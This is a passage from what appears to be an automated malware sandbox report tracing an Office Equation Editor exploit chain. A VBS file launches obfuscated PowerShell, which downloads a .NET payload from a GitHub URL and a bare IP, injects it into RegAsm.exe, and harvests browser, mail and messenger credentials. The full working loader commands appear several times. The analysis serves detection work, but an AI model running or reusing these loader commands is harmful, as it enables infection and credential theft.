                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,14_2_0041812A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe14_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00419662 mouse_event,14_2_00419662
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cxunlhrzeibfklqhoxlbtidgm"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkfttdhjjbkddjhzlumjvc0vqukvmzvjftknfkvsxldndkydyjy1kb2lujycpicgokcd7mn0nkyd1cicrj2wnkycgpsb7jysnmx0nkydodccrj3qnkydwjysnczovlycrj3inkydhjysndy5naxrojysndwj1c2vyy29udgvudc4nkydjjysnb20vticrj29ezxrly3rpjysnbi8nkydojysnb0rldgunkydjjysnde9ulycrj3inkydlznmnkycvagvhzhmvbwenkydpbi8nkydezxrhjysnae5vdggtjysnvi50jysnehr7mx07ihsyfwjhc2unkyc2nenvbnrlbnqgpsaotmv3lu9ijysnamvjdcbtexn0zw0nkycujysntmv0llcnkydlyknsawvudckurg8nkyd3bmxvywrtdhjpjysnbmcoezj9dxjsktsnkycgezinkyd9ymluyxinkyd5q29udgvudca9ifttexn0zw0ujysnq29udmunkydydf06okzyjysnb21cyscrj3nlnjrtjysndccrj3jpbmcoezj9ymfzzty0q29udgunkydudck7ihsyfwfzc2vtymx5id0gjysnw1jlzmxljysny3rpbycrj24uqxnzzw1ibhldojpmjysnb2fkkhsyjysnfwjpjysnbmenkydyjysneumnkydvbnrljysnbnqpoybbjysnzg5sjysnawiujysnsu8ujysnsg9tjysnzv06oicrj1ynkydbsscrjygnkyd7mh10eccrj3quqycrj0zeuicrj1jxlycrjza4lzc3ms42jysnos40mzeumtkvlzpwdccrj3roezb9lcb7mh1kzxnhdgl2jysnywrveycrjzb9jysnlcb7mh1kzxnhjysndgl2ywrveycrjzb9lccrjyb7mh1kzxnhdgl2jysnywrvezankyd9lcb7mh0nkydszwdbcycrj217mh0nkycsihsnkycwjysnfscrj3snkycwfsx7mh17mccrj30pjykglwygiftdaefyxtm0lftdaefyxtm5lftdaefyxtm2ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/n'+'odetecto'+'n/'+'n'+'odete'+'c'+'ton/'+'r'+'efs'+'/heads/ma'+'in/'+'deta'+'hnoth-'+'v.t'+'xt{1}; {2}base'+'64content = (new-ob'+'ject system'+'.'+'net.w'+'ebclient).do'+'wnloadstri'+'ng({2}url);'+' {2'+'}binar'+'ycontent = [system.'+'conve'+'rt]::fr'+'omba'+'se64s'+'t'+'ring({2}base64conte'+'nt); {2}assembly = '+'[refle'+'ctio'+'n.assembly]::l'+'oad({2'+'}bi'+'na'+'r'+'yc'+'onte'+'nt); ['+'dnl'+'ib.'+'io.'+'hom'+'e]::'+'v'+'ai'+'('+'{0}tx'+'t.c'+'fdr'+'rw/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'regas'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [char]34,[char]39,[char]36))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggkfttdhjjbkddjhzlumjvc0vqukvmzvjftknfkvsxldndkydyjy1kb2lujycpicgokcd7mn0nkyd1cicrj2wnkycgpsb7jysnmx0nkydodccrj3qnkydwjysnczovlycrj3inkydhjysndy5naxrojysndwj1c2vyy29udgvudc4nkydjjysnb20vticrj29ezxrly3rpjysnbi8nkydojysnb0rldgunkydjjysnde9ulycrj3inkydlznmnkycvagvhzhmvbwenkydpbi8nkydezxrhjysnae5vdggtjysnvi50jysnehr7mx07ihsyfwjhc2unkyc2nenvbnrlbnqgpsaotmv3lu9ijysnamvjdcbtexn0zw0nkycujysntmv0llcnkydlyknsawvudckurg8nkyd3bmxvywrtdhjpjysnbmcoezj9dxjsktsnkycgezinkyd9ymluyxinkyd5q29udgvudca9ifttexn0zw0ujysnq29udmunkydydf06okzyjysnb21cyscrj3nlnjrtjysndccrj3jpbmcoezj9ymfzzty0q29udgunkydudck7ihsyfwfzc2vtymx5id0gjysnw1jlzmxljysny3rpbycrj24uqxnzzw1ibhldojpmjysnb2fkkhsyjysnfwjpjysnbmenkydyjysneumnkydvbnrljysnbnqpoybbjysnzg5sjysnawiujysnsu8ujysnsg9tjysnzv06oicrj1ynkydbsscrjygnkyd7mh10eccrj3quqycrj0zeuicrj1jxlycrjza4lzc3ms42jysnos40mzeumtkvlzpwdccrj3roezb9lcb7mh1kzxnhdgl2jysnywrveycrjzb9jysnlcb7mh1kzxnhjysndgl2ywrveycrjzb9lccrjyb7mh1kzxnhdgl2jysnywrvezankyd9lcb7mh0nkydszwdbcycrj217mh0nkycsihsnkycwjysnfscrj3snkycwfsx7mh17mccrj30pjykglwygiftdaefyxtm0lftdaefyxtm5lftdaefyxtm2ksk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( ([string]$verbosepreference)[1,3]+'x'-join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/n'+'odetecto'+'n/'+'n'+'odete'+'c'+'ton/'+'r'+'efs'+'/heads/ma'+'in/'+'deta'+'hnoth-'+'v.t'+'xt{1}; {2}base'+'64content = (new-ob'+'ject system'+'.'+'net.w'+'ebclient).do'+'wnloadstri'+'ng({2}url);'+' {2'+'}binar'+'ycontent = [system.'+'conve'+'rt]::fr'+'omba'+'se64s'+'t'+'ring({2}base64conte'+'nt); {2}assembly = '+'[refle'+'ctio'+'n.assembly]::l'+'oad({2'+'}bi'+'na'+'r'+'yc'+'onte'+'nt); ['+'dnl'+'ib.'+'io.'+'hom'+'e]::'+'v'+'ai'+'('+'{0}tx'+'t.c'+'fdr'+'rw/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'regas'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [char]34,[char]39,[char]36))"Jump to behavior
                  Source: RegAsm.exe, 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: RegAsm.exe, 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: RegAsm.exe, 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChromeompatibility Mode] - Microsoft Word;
                  Source: RegAsm.exe, 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmp, logs.dat.14.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00434CB6 cpuid 14_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,14_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,14_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,14_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,14_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,14_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,14_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,14_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_004489D7 GetSystemTimeAsFileTime,14_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B69E GetComputerNameExW,GetUserNameW,14_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,14_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.924048781.0000000000771000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\notpad0\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data14_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db14_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
